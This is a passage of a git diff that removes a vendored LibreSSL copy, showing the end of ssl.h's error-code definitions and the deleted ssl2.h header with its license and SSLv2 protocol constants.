-#define SSL_F_SSL_PARSE_CLIENTHELLO_USE_SRTP_EXT	 310
-#define SSL_F_SSL_PARSE_SERVERHELLO_RENEGOTIATE_EXT	 301
-#define SSL_F_SSL_PARSE_SERVERHELLO_TLSEXT		 303
-#define SSL_F_SSL_PARSE_SERVERHELLO_USE_SRTP_EXT	 311
-#define SSL_F_SSL_PEEK					 270
-#define SSL_F_SSL_PREPARE_CLIENTHELLO_TLSEXT		 281
-#define SSL_F_SSL_PREPARE_SERVERHELLO_TLSEXT		 282
-#define SSL_F_SSL_READ					 223
-#define SSL_F_SSL_RSA_PRIVATE_DECRYPT			 187
-#define SSL_F_SSL_RSA_PUBLIC_ENCRYPT			 188
-#define SSL_F_SSL_SESSION_NEW				 189
-#define SSL_F_SSL_SESSION_PRINT_FP			 190
-#define SSL_F_SSL_SESSION_SET1_ID_CONTEXT		 312
-#define SSL_F_SSL_SESS_CERT_NEW				 225
-#define SSL_F_SSL_SET_CERT				 191
-#define SSL_F_SSL_SET_CIPHER_LIST			 271
-#define SSL_F_SSL_SET_FD				 192
-#define SSL_F_SSL_SET_PKEY				 193
-#define SSL_F_SSL_SET_PURPOSE				 227
-#define SSL_F_SSL_SET_RFD				 194
-#define SSL_F_SSL_SET_SESSION				 195
-#define SSL_F_SSL_SET_SESSION_ID_CONTEXT		 218
-#define SSL_F_SSL_SET_SESSION_TICKET_EXT		 294
-#define SSL_F_SSL_SET_TRUST				 228
-#define SSL_F_SSL_SET_WFD				 196
-#define SSL_F_SSL_SHUTDOWN				 224
-#define SSL_F_SSL_SRP_CTX_INIT				 313
-#define SSL_F_SSL_UNDEFINED_CONST_FUNCTION		 243
-#define SSL_F_SSL_UNDEFINED_FUNCTION			 197
-#define SSL_F_SSL_UNDEFINED_VOID_FUNCTION		 244
-#define SSL_F_SSL_USE_CERTIFICATE			 198
-#define SSL_F_SSL_USE_CERTIFICATE_ASN1			 199
-#define SSL_F_SSL_USE_CERTIFICATE_FILE			 200
-#define SSL_F_SSL_USE_PRIVATEKEY			 201
-#define SSL_F_SSL_USE_PRIVATEKEY_ASN1			 202
-#define SSL_F_SSL_USE_PRIVATEKEY_FILE			 203
-#define SSL_F_SSL_USE_PSK_IDENTITY_HINT			 273
-#define SSL_F_SSL_USE_RSAPRIVATEKEY			 204
-#define SSL_F_SSL_USE_RSAPRIVATEKEY_ASN1		 205
-#define SSL_F_SSL_USE_RSAPRIVATEKEY_FILE		 206
-#define SSL_F_SSL_VERIFY_CERT_CHAIN			 207
-#define SSL_F_SSL_WRITE					 208
-#define SSL_F_TLS1_AEAD_CTX_INIT			 339
-#define SSL_F_TLS1_CERT_VERIFY_MAC			 286
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE			 209
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE_AEAD		 340
-#define SSL_F_TLS1_CHANGE_CIPHER_STATE_CIPHER		 338
-#define SSL_F_TLS1_CHECK_SERVERHELLO_TLSEXT		 274
-#define SSL_F_TLS1_ENC					 210
-#define SSL_F_TLS1_EXPORT_KEYING_MATERIAL		 314
-#define SSL_F_TLS1_HEARTBEAT				 315
-#define SSL_F_TLS1_PREPARE_CLIENTHELLO_TLSEXT		 275
-#define SSL_F_TLS1_PREPARE_SERVERHELLO_TLSEXT		 276
-#define SSL_F_TLS1_PRF					 284
-#define SSL_F_TLS1_SETUP_KEY_BLOCK			 211
-#define SSL_F_WRITE_PENDING				 212
-
-/* Reason codes. */
-#define SSL_R_APP_DATA_IN_HANDSHAKE			 100
-#define SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT 272
-#define SSL_R_BAD_ALERT_RECORD				 101
-#define SSL_R_BAD_AUTHENTICATION_TYPE			 102
-#define SSL_R_BAD_CHANGE_CIPHER_SPEC			 103
-#define SSL_R_BAD_CHECKSUM				 104
-#define SSL_R_BAD_DATA_RETURNED_BY_CALLBACK		 106
-#define SSL_R_BAD_DECOMPRESSION				 107
-#define SSL_R_BAD_DH_G_LENGTH				 108
-#define SSL_R_BAD_DH_PUB_KEY_LENGTH			 109
-#define SSL_R_BAD_DH_P_LENGTH				 110
-#define SSL_R_BAD_DIGEST_LENGTH				 111
-#define SSL_R_BAD_DSA_SIGNATURE				 112
-#define SSL_R_BAD_ECC_CERT				 304
-#define SSL_R_BAD_ECDSA_SIGNATURE			 305
-#define SSL_R_BAD_ECPOINT				 306
-#define SSL_R_BAD_HANDSHAKE_LENGTH			 332
-#define SSL_R_BAD_HELLO_REQUEST				 105
-#define SSL_R_BAD_LENGTH				 271
-#define SSL_R_BAD_MAC_DECODE				 113
-#define SSL_R_BAD_MAC_LENGTH				 333
-#define SSL_R_BAD_MESSAGE_TYPE				 114
-#define SSL_R_BAD_PACKET_LENGTH				 115
-#define SSL_R_BAD_PROTOCOL_VERSION_NUMBER		 116
-#define SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH		 316
-#define SSL_R_BAD_RESPONSE_ARGUMENT			 117
-#define SSL_R_BAD_RSA_DECRYPT				 118
-#define SSL_R_BAD_RSA_ENCRYPT				 119
-#define SSL_R_BAD_RSA_E_LENGTH				 120
-#define SSL_R_BAD_RSA_MODULUS_LENGTH			 121
-#define SSL_R_BAD_RSA_SIGNATURE				 122
-#define SSL_R_BAD_SIGNATURE				 123
-#define SSL_R_BAD_SRP_A_LENGTH				 347
-#define SSL_R_BAD_SRP_B_LENGTH				 348
-#define SSL_R_BAD_SRP_G_LENGTH				 349
-#define SSL_R_BAD_SRP_N_LENGTH				 350
-#define SSL_R_BAD_SRP_S_LENGTH				 351
-#define SSL_R_BAD_SRTP_MKI_VALUE			 352
-#define SSL_R_BAD_SRTP_PROTECTION_PROFILE_LIST		 353
-#define SSL_R_BAD_SSL_FILETYPE				 124
-#define SSL_R_BAD_SSL_SESSION_ID_LENGTH			 125
-#define SSL_R_BAD_STATE					 126
-#define SSL_R_BAD_WRITE_RETRY				 127
-#define SSL_R_BIO_NOT_SET				 128
-#define SSL_R_BLOCK_CIPHER_PAD_IS_WRONG			 129
-#define SSL_R_BN_LIB					 130
-#define SSL_R_CA_DN_LENGTH_MISMATCH			 131
-#define SSL_R_CA_DN_TOO_LONG				 132
-#define SSL_R_CCS_RECEIVED_EARLY			 133
-#define SSL_R_CERTIFICATE_VERIFY_FAILED			 134
-#define SSL_R_CERT_LENGTH_MISMATCH			 135
-#define SSL_R_CHALLENGE_IS_DIFFERENT			 136
-#define SSL_R_CIPHER_CODE_WRONG_LENGTH			 137
-#define SSL_R_CIPHER_COMPRESSION_UNAVAILABLE		 371
-#define SSL_R_CIPHER_OR_HASH_UNAVAILABLE		 138
-#define SSL_R_CIPHER_TABLE_SRC_ERROR			 139
-#define SSL_R_CLIENTHELLO_TLSEXT			 226
-#define SSL_R_COMPRESSED_LENGTH_TOO_LONG		 140
-#define SSL_R_COMPRESSION_DISABLED			 343
-#define SSL_R_COMPRESSION_FAILURE			 141
-#define SSL_R_COMPRESSION_ID_NOT_WITHIN_PRIVATE_RANGE	 307
-#define SSL_R_COMPRESSION_LIBRARY_ERROR			 142
-#define SSL_R_CONNECTION_ID_IS_DIFFERENT		 143
-#define SSL_R_CONNECTION_TYPE_NOT_SET			 144
-#define SSL_R_COOKIE_MISMATCH				 308
-#define SSL_R_DATA_BETWEEN_CCS_AND_FINISHED		 145
-#define SSL_R_DATA_LENGTH_TOO_LONG			 146
-#define SSL_R_DECRYPTION_FAILED				 147
-#define SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC	 281
-#define SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG		 148
-#define SSL_R_DIGEST_CHECK_FAILED			 149
-#define SSL_R_DTLS_MESSAGE_TOO_BIG			 334
-#define SSL_R_DUPLICATE_COMPRESSION_ID			 309
-#define SSL_R_ECC_CERT_NOT_FOR_KEY_AGREEMENT		 317
-#define SSL_R_ECC_CERT_NOT_FOR_SIGNING			 318
-#define SSL_R_ECC_CERT_SHOULD_HAVE_RSA_SIGNATURE	 322
-#define SSL_R_ECC_CERT_SHOULD_HAVE_SHA1_SIGNATURE	 323
-#define SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER		 310
-#define SSL_R_EMPTY_SRTP_PROTECTION_PROFILE_LIST	 354
-#define SSL_R_ENCRYPTED_LENGTH_TOO_LONG			 150
-#define SSL_R_ERROR_GENERATING_TMP_RSA_KEY		 282
-#define SSL_R_ERROR_IN_RECEIVED_CIPHER_LIST		 151
-#define SSL_R_EXCESSIVE_MESSAGE_SIZE			 152
-#define SSL_R_EXTRA_DATA_IN_MESSAGE			 153
-#define SSL_R_GOT_A_FIN_BEFORE_A_CCS			 154
-#define SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS		 355
-#define SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION		 356
-#define SSL_R_HTTPS_PROXY_REQUEST			 155
-#define SSL_R_HTTP_REQUEST				 156
-#define SSL_R_ILLEGAL_PADDING				 283
-#define SSL_R_INAPPROPRIATE_FALLBACK			 373
-#define SSL_R_INCONSISTENT_COMPRESSION			 340
-#define SSL_R_INVALID_CHALLENGE_LENGTH			 158
-#define SSL_R_INVALID_COMMAND				 280
-#define SSL_R_INVALID_COMPRESSION_ALGORITHM		 341
-#define SSL_R_INVALID_PURPOSE				 278
-#define SSL_R_INVALID_SRP_USERNAME			 357
-#define SSL_R_INVALID_STATUS_RESPONSE			 328
-#define SSL_R_INVALID_TICKET_KEYS_LENGTH		 325
-#define SSL_R_INVALID_TRUST				 279
-#define SSL_R_KEY_ARG_TOO_LONG				 284
-#define SSL_R_KRB5					 285
-#define SSL_R_KRB5_C_CC_PRINC				 286
-#define SSL_R_KRB5_C_GET_CRED				 287
-#define SSL_R_KRB5_C_INIT				 288
-#define SSL_R_KRB5_C_MK_REQ				 289
-#define SSL_R_KRB5_S_BAD_TICKET				 290
-#define SSL_R_KRB5_S_INIT				 291
-#define SSL_R_KRB5_S_RD_REQ				 292
-#define SSL_R_KRB5_S_TKT_EXPIRED			 293
-#define SSL_R_KRB5_S_TKT_NYV				 294
-#define SSL_R_KRB5_S_TKT_SKEW				 295
-#define SSL_R_LENGTH_MISMATCH				 159
-#define SSL_R_LENGTH_TOO_SHORT				 160
-#define SSL_R_LIBRARY_BUG				 274
-#define SSL_R_LIBRARY_HAS_NO_CIPHERS			 161
-#define SSL_R_MESSAGE_TOO_LONG				 296
-#define SSL_R_MISSING_DH_DSA_CERT			 162
-#define SSL_R_MISSING_DH_KEY				 163
-#define SSL_R_MISSING_DH_RSA_CERT			 164
-#define SSL_R_MISSING_DSA_SIGNING_CERT			 165
-#define SSL_R_MISSING_EXPORT_TMP_DH_KEY			 166
-#define SSL_R_MISSING_EXPORT_TMP_RSA_KEY		 167
-#define SSL_R_MISSING_RSA_CERTIFICATE			 168
-#define SSL_R_MISSING_RSA_ENCRYPTING_CERT		 169
-#define SSL_R_MISSING_RSA_SIGNING_CERT			 170
-#define SSL_R_MISSING_SRP_PARAM				 358
-#define SSL_R_MISSING_TMP_DH_KEY			 171
-#define SSL_R_MISSING_TMP_ECDH_KEY			 311
-#define SSL_R_MISSING_TMP_RSA_KEY			 172
-#define SSL_R_MISSING_TMP_RSA_PKEY			 173
-#define SSL_R_MISSING_VERIFY_MESSAGE			 174
-#define SSL_R_MULTIPLE_SGC_RESTARTS			 346
-#define SSL_R_NON_SSLV2_INITIAL_PACKET			 175
-#define SSL_R_NO_CERTIFICATES_RETURNED			 176
-#define SSL_R_NO_CERTIFICATE_ASSIGNED			 177
-#define SSL_R_NO_CERTIFICATE_RETURNED			 178
-#define SSL_R_NO_CERTIFICATE_SET			 179
-#define SSL_R_NO_CERTIFICATE_SPECIFIED			 180
-#define SSL_R_NO_CIPHERS_AVAILABLE			 181
-#define SSL_R_NO_CIPHERS_PASSED				 182
-#define SSL_R_NO_CIPHERS_SPECIFIED			 183
-#define SSL_R_NO_CIPHER_LIST				 184
-#define SSL_R_NO_CIPHER_MATCH				 185
-#define SSL_R_NO_CLIENT_CERT_METHOD			 331
-#define SSL_R_NO_CLIENT_CERT_RECEIVED			 186
-#define SSL_R_NO_COMPRESSION_SPECIFIED			 187
-#define SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER		 330
-#define SSL_R_NO_METHOD_SPECIFIED			 188
-#define SSL_R_NO_PRIVATEKEY				 189
-#define SSL_R_NO_PRIVATE_KEY_ASSIGNED			 190
-#define SSL_R_NO_PROTOCOLS_AVAILABLE			 191
-#define SSL_R_NO_PUBLICKEY				 192
-#define SSL_R_NO_RENEGOTIATION				 339
-#define SSL_R_NO_REQUIRED_DIGEST			 324
-#define SSL_R_NO_SHARED_CIPHER				 193
-#define SSL_R_NO_SRTP_PROFILES				 359
-#define SSL_R_NO_VERIFY_CALLBACK			 194
-#define SSL_R_NULL_SSL_CTX				 195
-#define SSL_R_NULL_SSL_METHOD_PASSED			 196
-#define SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED		 197
-#define SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED 344
-#define SSL_R_ONLY_TLS_ALLOWED_IN_FIPS_MODE		 297
-#define SSL_R_PACKET_LENGTH_TOO_LONG			 198
-#define SSL_R_PARSE_TLSEXT				 227
-#define SSL_R_PATH_TOO_LONG				 270
-#define SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE		 199
-#define SSL_R_PEER_ERROR				 200
-#define SSL_R_PEER_ERROR_CERTIFICATE			 201
-#define SSL_R_PEER_ERROR_NO_CERTIFICATE			 202
-#define SSL_R_PEER_ERROR_NO_CIPHER			 203
-#define SSL_R_PEER_ERROR_UNSUPPORTED_CERTIFICATE_TYPE	 204
-#define SSL_R_PRE_MAC_LENGTH_TOO_LONG			 205
-#define SSL_R_PROBLEMS_MAPPING_CIPHER_FUNCTIONS		 206
-#define SSL_R_PROTOCOL_IS_SHUTDOWN			 207
-#define SSL_R_PSK_IDENTITY_NOT_FOUND			 223
-#define SSL_R_PSK_NO_CLIENT_CB				 224
-#define SSL_R_PSK_NO_SERVER_CB				 225
-#define SSL_R_PUBLIC_KEY_ENCRYPT_ERROR			 208
-#define SSL_R_PUBLIC_KEY_IS_NOT_RSA			 209
-#define SSL_R_PUBLIC_KEY_NOT_RSA			 210
-#define SSL_R_READ_BIO_NOT_SET				 211
-#define SSL_R_READ_TIMEOUT_EXPIRED			 312
-#define SSL_R_READ_WRONG_PACKET_TYPE			 212
-#define SSL_R_RECORD_LENGTH_MISMATCH			 213
-#define SSL_R_RECORD_TOO_LARGE				 214
-#define SSL_R_RECORD_TOO_SMALL				 298
-#define SSL_R_RENEGOTIATE_EXT_TOO_LONG			 335
-#define SSL_R_RENEGOTIATION_ENCODING_ERR		 336
-#define SSL_R_RENEGOTIATION_MISMATCH			 337
-#define SSL_R_REQUIRED_CIPHER_MISSING			 215
-#define SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING	 342
-#define SSL_R_REUSE_CERT_LENGTH_NOT_ZERO		 216
-#define SSL_R_REUSE_CERT_TYPE_NOT_ZERO			 217
-#define SSL_R_REUSE_CIPHER_LIST_NOT_ZERO		 218
-#define SSL_R_SCSV_RECEIVED_WHEN_RENEGOTIATING		 345
-#define SSL_R_SERVERHELLO_TLSEXT			 275
-#define SSL_R_SESSION_ID_CONTEXT_UNINITIALIZED		 277
-#define SSL_R_SHORT_READ				 219
-#define SSL_R_SIGNATURE_ALGORITHMS_ERROR		 360
-#define SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE	 220
-#define SSL_R_SRP_A_CALC				 361
-#define SSL_R_SRTP_COULD_NOT_ALLOCATE_PROFILES		 362
-#define SSL_R_SRTP_PROTECTION_PROFILE_LIST_TOO_LONG	 363
-#define SSL_R_SRTP_UNKNOWN_PROTECTION_PROFILE		 364
-#define SSL_R_SSL23_DOING_SESSION_ID_REUSE		 221
-#define SSL_R_SSL2_CONNECTION_ID_TOO_LONG		 299
-#define SSL_R_SSL3_EXT_INVALID_ECPOINTFORMAT		 321
-#define SSL_R_SSL3_EXT_INVALID_SERVERNAME		 319
-#define SSL_R_SSL3_EXT_INVALID_SERVERNAME_TYPE		 320
-#define SSL_R_SSL3_SESSION_ID_TOO_LONG			 300
-#define SSL_R_SSL3_SESSION_ID_TOO_SHORT			 222
-#define SSL_R_SSLV3_ALERT_BAD_CERTIFICATE		 1042
-#define SSL_R_SSLV3_ALERT_BAD_RECORD_MAC		 1020
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_EXPIRED		 1045
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_REVOKED		 1044
-#define SSL_R_SSLV3_ALERT_CERTIFICATE_UNKNOWN		 1046
-#define SSL_R_SSLV3_ALERT_DECOMPRESSION_FAILURE		 1030
-#define SSL_R_SSLV3_ALERT_HANDSHAKE_FAILURE		 1040
-#define SSL_R_SSLV3_ALERT_ILLEGAL_PARAMETER		 1047
-#define SSL_R_SSLV3_ALERT_NO_CERTIFICATE		 1041
-#define SSL_R_SSLV3_ALERT_UNEXPECTED_MESSAGE		 1010
-#define SSL_R_SSLV3_ALERT_UNSUPPORTED_CERTIFICATE	 1043
-#define SSL_R_SSL_CTX_HAS_NO_DEFAULT_SSL_VERSION	 228
-#define SSL_R_SSL_HANDSHAKE_FAILURE			 229
-#define SSL_R_SSL_LIBRARY_HAS_NO_CIPHERS		 230
-#define SSL_R_SSL_SESSION_ID_CALLBACK_FAILED		 301
-#define SSL_R_SSL_SESSION_ID_CONFLICT			 302
-#define SSL_R_SSL_SESSION_ID_CONTEXT_TOO_LONG		 273
-#define SSL_R_SSL_SESSION_ID_HAS_BAD_LENGTH		 303
-#define SSL_R_SSL_SESSION_ID_IS_DIFFERENT		 231
-#define SSL_R_TLSV1_ALERT_ACCESS_DENIED			 1049
-#define SSL_R_TLSV1_ALERT_DECODE_ERROR			 1050
-#define SSL_R_TLSV1_ALERT_DECRYPTION_FAILED		 1021
-#define SSL_R_TLSV1_ALERT_DECRYPT_ERROR			 1051
-#define SSL_R_TLSV1_ALERT_EXPORT_RESTRICTION		 1060
-#define SSL_R_TLSV1_ALERT_INAPPROPRIATE_FALLBACK	 1086
-#define SSL_R_TLSV1_ALERT_INSUFFICIENT_SECURITY		 1071
-#define SSL_R_TLSV1_ALERT_INTERNAL_ERROR		 1080
-#define SSL_R_TLSV1_ALERT_NO_RENEGOTIATION		 1100
-#define SSL_R_TLSV1_ALERT_PROTOCOL_VERSION		 1070
-#define SSL_R_TLSV1_ALERT_RECORD_OVERFLOW		 1022
-#define SSL_R_TLSV1_ALERT_UNKNOWN_CA			 1048
-#define SSL_R_TLSV1_ALERT_USER_CANCELLED		 1090
-#define SSL_R_TLSV1_BAD_CERTIFICATE_HASH_VALUE		 1114
-#define SSL_R_TLSV1_BAD_CERTIFICATE_STATUS_RESPONSE	 1113
-#define SSL_R_TLSV1_CERTIFICATE_UNOBTAINABLE		 1111
-#define SSL_R_TLSV1_UNRECOGNIZED_NAME			 1112
-#define SSL_R_TLSV1_UNSUPPORTED_EXTENSION		 1110
-#define SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER	 232
-#define SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT		 365
-#define SSL_R_TLS_HEARTBEAT_PENDING			 366
-#define SSL_R_TLS_ILLEGAL_EXPORTER_LABEL		 367
-#define SSL_R_TLS_INVALID_ECPOINTFORMAT_LIST		 157
-#define SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST 233
-#define SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG	 234
-#define SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER		 235
-#define SSL_R_UNABLE_TO_DECODE_DH_CERTS			 236
-#define SSL_R_UNABLE_TO_DECODE_ECDH_CERTS		 313
-#define SSL_R_UNABLE_TO_EXTRACT_PUBLIC_KEY		 237
-#define SSL_R_UNABLE_TO_FIND_DH_PARAMETERS		 238
-#define SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS		 314
-#define SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS	 239
-#define SSL_R_UNABLE_TO_FIND_SSL_METHOD			 240
-#define SSL_R_UNABLE_TO_LOAD_SSL2_MD5_ROUTINES		 241
-#define SSL_R_UNABLE_TO_LOAD_SSL3_MD5_ROUTINES		 242
-#define SSL_R_UNABLE_TO_LOAD_SSL3_SHA1_ROUTINES		 243
-#define SSL_R_UNEXPECTED_MESSAGE			 244
-#define SSL_R_UNEXPECTED_RECORD				 245
-#define SSL_R_UNINITIALIZED				 276
-#define SSL_R_UNKNOWN_ALERT_TYPE			 246
-#define SSL_R_UNKNOWN_CERTIFICATE_TYPE			 247
-#define SSL_R_UNKNOWN_CIPHER_RETURNED			 248
-#define SSL_R_UNKNOWN_CIPHER_TYPE			 249
-#define SSL_R_UNKNOWN_DIGEST				 368
-#define SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE			 250
-#define SSL_R_UNKNOWN_PKEY_TYPE				 251
-#define SSL_R_UNKNOWN_PROTOCOL				 252
-#define SSL_R_UNKNOWN_REMOTE_ERROR_TYPE			 253
-#define SSL_R_UNKNOWN_SSL_VERSION			 254
-#define SSL_R_UNKNOWN_STATE				 255
-#define SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED	 338
-#define SSL_R_UNSUPPORTED_CIPHER			 256
-#define SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM		 257
-#define SSL_R_UNSUPPORTED_DIGEST_TYPE			 326
-#define SSL_R_UNSUPPORTED_ELLIPTIC_CURVE		 315
-#define SSL_R_UNSUPPORTED_PROTOCOL			 258
-#define SSL_R_UNSUPPORTED_SSL_VERSION			 259
-#define SSL_R_UNSUPPORTED_STATUS_TYPE			 329
-#define SSL_R_USE_SRTP_NOT_NEGOTIATED			 369
-#define SSL_R_WRITE_BIO_NOT_SET				 260
-#define SSL_R_WRONG_CIPHER_RETURNED			 261
-#define SSL_R_WRONG_CURVE				 378
-#define SSL_R_WRONG_MESSAGE_TYPE			 262
-#define SSL_R_WRONG_NUMBER_OF_KEY_BITS			 263
-#define SSL_R_WRONG_SIGNATURE_LENGTH			 264
-#define SSL_R_WRONG_SIGNATURE_SIZE			 265
-#define SSL_R_WRONG_SIGNATURE_TYPE			 370
-#define SSL_R_WRONG_SSL_VERSION				 266
-#define SSL_R_WRONG_VERSION_NUMBER			 267
-#define SSL_R_X509_LIB					 268
-#define SSL_R_X509_VERIFICATION_SETUP_PROBLEMS		 269
-#define SSL_R_PEER_BEHAVING_BADLY			 666
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl2.h b/thirdparty/libressl/include/openssl/ssl2.h
deleted file mode 100644
index 3a8d300..0000000
--- a/thirdparty/libressl/include/openssl/ssl2.h
+++ /dev/null
@@ -1,153 +0,0 @@
-/* $OpenBSD: ssl2.h,v 1.12 2014/12/14 15:30:50 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_SSL2_H
-#define HEADER_SSL2_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Protocol Version Codes */
-#define SSL2_VERSION		0x0002
-#define SSL2_VERSION_MAJOR	0x00
-#define SSL2_VERSION_MINOR	0x02
-/* #define SSL2_CLIENT_VERSION	0x0002 */
-/* #define SSL2_SERVER_VERSION	0x0002 */
-
-/* Protocol Message Codes */
-#define SSL2_MT_ERROR			0
-#define SSL2_MT_CLIENT_HELLO		1
-#define SSL2_MT_CLIENT_MASTER_KEY	2
-#define SSL2_MT_CLIENT_FINISHED		3
-#define SSL2_MT_SERVER_HELLO		4
-#define SSL2_MT_SERVER_VERIFY		5
-#define SSL2_MT_SERVER_FINISHED		6
-#define SSL2_MT_REQUEST_CERTIFICATE	7
-#define SSL2_MT_CLIENT_CERTIFICATE	8
-
-/* Error Message Codes */
-#define SSL2_PE_UNDEFINED_ERROR		0x0000
-#define SSL2_PE_NO_CIPHER		0x0001
-#define SSL2_PE_NO_CERTIFICATE		0x0002
-#define SSL2_PE_BAD_CERTIFICATE		0x0004
-#define SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE 0x0006
-
-/* Cipher Kind Values */
-#define SSL2_CK_NULL_WITH_MD5			0x02000000 /* v3 */
-#define SSL2_CK_RC4_128_WITH_MD5		0x02010080
-#define SSL2_CK_RC4_128_EXPORT40_WITH_MD5	0x02020080
-#define SSL2_CK_RC2_128_CBC_WITH_MD5		0x02030080
-#define SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5	0x02040080
-#define SSL2_CK_IDEA_128_CBC_WITH_MD5		0x02050080
-#define SSL2_CK_DES_64_CBC_WITH_MD5		0x02060040
-#define SSL2_CK_DES_64_CBC_WITH_SHA		0x02060140 /* v3 */
-#define SSL2_CK_DES_192_EDE3_CBC_WITH_MD5	0x020700c0
-#define SSL2_CK_DES_192_EDE3_CBC_WITH_SHA	0x020701c0 /* v3 */
-#define SSL2_CK_RC4_64_WITH_MD5			0x02080080 /* MS hack */
-
-#define SSL2_CK_DES_64_CFB64_WITH_MD5_1		0x02ff0800 /* SSLeay */
-#define SSL2_CK_NULL				0x02ff0810 /* SSLeay */
-
-#define SSL2_TXT_DES_64_CFB64_WITH_MD5_1	"DES-CFB-M1"
-#define SSL2_TXT_NULL_WITH_MD5			"NULL-MD5"
-#define SSL2_TXT_RC4_128_WITH_MD5		"RC4-MD5"
-#define SSL2_TXT_RC4_128_EXPORT40_WITH_MD5	"EXP-RC4-MD5"
-#define SSL2_TXT_RC2_128_CBC_WITH_MD5		"RC2-CBC-MD5"
-#define SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5	"EXP-RC2-CBC-MD5"
-#define SSL2_TXT_IDEA_128_CBC_WITH_MD5		"IDEA-CBC-MD5"
-#define SSL2_TXT_DES_64_CBC_WITH_MD5		"DES-CBC-MD5"
-#define SSL2_TXT_DES_64_CBC_WITH_SHA		"DES-CBC-SHA"
-#define SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5	"DES-CBC3-MD5"
-#define SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA	"DES-CBC3-SHA"
-#define SSL2_TXT_RC4_64_WITH_MD5		"RC4-64-MD5"
-
-#define SSL2_TXT_NULL				"NULL"
-
-/* Flags for the SSL_CIPHER.algorithm2 field */
-#define SSL2_CF_5_BYTE_ENC			0x01
-#define SSL2_CF_8_BYTE_ENC			0x02
-
-/* Certificate Type Codes */
-#define SSL2_CT_X509_CERTIFICATE		0x01
-
-/* Authentication Type Code */
-#define SSL2_AT_MD5_WITH_RSA_ENCRYPTION		0x01
-
-#define SSL2_MAX_SSL_SESSION_ID_LENGTH		32
-
-/* Upper/Lower Bounds */
-#define SSL2_MAX_MASTER_KEY_LENGTH_IN_BITS	256
-#define SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER	32767u	/* 2^15-1 */
